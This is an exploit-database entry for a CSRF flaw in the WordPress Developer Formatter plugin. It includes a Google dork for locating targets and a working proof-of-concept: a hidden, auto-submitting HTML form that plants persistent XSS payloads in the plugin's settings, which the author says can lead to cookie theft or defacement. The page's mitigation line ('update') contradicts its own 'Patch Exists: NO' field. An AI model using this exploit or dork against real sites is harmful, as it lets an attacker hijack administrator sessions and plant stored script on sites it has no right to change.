header-logo
Suggest Exploit
vendor:
Developer Formatter
by:
Junaid Hussain
7.5
CVSS
HIGH
CSRF
352
CWE
Product Name: Developer Formatter
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: CentOS 5
2013

WordPress Developer Formatter CSRF Vulnerability

CSRF vulnerability in Wordpress Developer Formatter plugin allows attackers to perform unauthorized actions on behalf of authenticated users.

Mitigation:

Update to the latest version of the plugin.
Source

Exploit-DB raw data:

====================================================================================================================
# Exploit Title: Wordpress Developer Formatter CSRF Vulnerability
# Google Dork: inurl:devformatter/devformatter.php
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com
# Software Link: http://wordpress.org/extend/plugins/devformatter/
# Vendor: http://wordpress.org/extend/plugins/devformatter/
# Tested on: CentOS 5  
# Version: Wordpress Version 3.5, Should work on all versions.

====================================================================================================================
[#] Vulnerable Code
Page: devinterface.php - Line: 46  
 <form method="post" action="options-general.php?page=devformatter/devformatter.php">
[#] no nonce given - Read: http://codex.wordpress.org/Function_Reference/wp_nonce_field
====================================================================================================================
// CSRF Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/> 
<input name="copyclipboartext" type="text" style="display:none;" value="&lt;/textarea&gt;<script>alert(/xss/)</script>"  />
<input name="showtools" style="display:none;" type="checkbox" checked/> 
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;"> 
	  body {
  background-image: url('javascript:alert("XSS");') !important;
}
&lt;/textarea&gt;
 </form></html>
====================================================================================================================
[#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing,
    malware distribution or even a defacememnt.
[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, 
                The Author of this exploit takes no responsibility for the way
                you use this exploit, you are responsible for your own actions.	
====================================================================================================================
Original: http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txt